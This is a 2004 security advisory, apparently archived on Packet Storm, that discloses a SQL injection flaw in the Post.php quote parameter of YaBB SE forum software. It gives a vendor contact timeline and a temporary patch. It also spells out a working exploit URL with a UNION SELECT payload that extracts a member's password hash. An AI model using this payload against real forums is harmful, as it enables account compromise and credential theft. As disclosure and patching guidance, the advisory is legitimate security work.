what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

yabbSE2.txt

yabbSE2.txt
Posted Feb 17, 2004
Authored by BaCkSpAcE

YaBB SE versions 1.54 and 1.55 are susceptible to a SQL injection vulnerability that allows a remote attacker to execute malicious SQL statements on the database remotely.

tags | advisory, remote, sql injection
SHA-256 | 0cb034ef99caa617751564217c86b7aa293f12c1a2e323fbaed9a9eb14a1dc80
Download | Favorite | View

yabbSE2.txt

Change Mirror Download
Summary
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board).

An SQL injection vulnerability allows a remote attacker to execute malicious
SQL statements on the database remotely

Details
Vulnerable Systems:
 * YaBB SE versions 1.5.4, 1.5.5, possibly others

The file Post.php is vulnerable to SQL injection because the quote parameter
isn't checked against malicious input, so is possible to inject SQL.

How To Exploit the vulnerability:

1- you need to be a registered user to exploit this hole.
2- Click any board you see. ex. General Discussion.
3- Click any message. ex Welcome to YaBB SE!
4- Now view the source code of this page and search this string "sesc"
withou the quotes this is the session id , is an hex number of 32 characters
ex.(13a478d8aa161c2231e6d3b36b6d19f2), you'll need this later
5- now your url is something like this
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- change your url to look like this.

http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

the value of sesc is the value you get before from the source code

and voilá  you get the hashed password from the user with the id = 1 in the
Subject textBox something like this
Re:e320774659b1b23333bd033754d21bc4


Vendor Status:
january 23, 2004: I contacted the vendor
january 23, 2004: Vendor says they are working on it.
january 29, 2004: I send another email to know how the work was progressing.
No Response.
february 3, 2004 I send another email to know the status of the work.
february 4, 2004 Vendor says the'll figure how to do.
february 16, 2004 I doesn't want to keep waiting, so i publish the
vulnerability.

Temporal Solution:

Open Post.php and go around line 49

you'll see something like this.

 $quotemsg = $quote;


change to this.

 if ( !is_numeric($quote) )
 {
    die('Go out C==|=======>');
 }

 $quotemsg = $quote;

that's it.


Credits go to: BackSpace




Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close